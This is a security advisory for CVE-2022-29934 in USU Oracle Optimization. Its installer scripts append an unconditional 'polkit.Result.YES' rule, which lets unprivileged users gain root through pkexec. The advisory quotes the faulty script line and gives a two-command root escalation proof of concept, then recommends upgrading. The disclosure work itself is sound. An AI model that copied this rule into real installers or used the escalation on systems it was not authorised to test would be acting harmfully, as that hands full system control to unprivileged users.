CVE-2022-29934: Build software better, together
USU Oracle Optimization before 5.17.5 lacks Polkit authentication, which allows smartcollector users to achieve root access via pkexec. NOTE: this is not an Oracle Corporation product.
Package
Oracle Optimization ( )
Overview
Unprivileged users such as “smartcollector” users can trivially escalate to root thanks to pkexec missconfiguration.
Impact
A compromised application server have full access to the system.
Details
Installation scripts for USU server enable polkit without authentication:
On file sources/database/1database_root.sh:898:
grep -q "polkit.Result.YES" /etc/polkit-1/rules.d/99-deny-all.rules >/dev/null 2>&1
On file sources/middleware/0middleware_root.sh:1746:
echo "return polkit.Result.YES;" >> /etc/polkit-1/rules.d/99-deny-all.rules
Proof of Concept
$ id
uid=1504(smartcollect) gid=1500(oinstall) groups=1500(oinstall),1504(smartcollect)
$ pkexec id
uid=0(root) gid=0(root) groups=0(root)
Recommendation****Security Patch
Upgrade to version 5.17.5
Workarounds
We suggest to disable polkit or enable authentication.
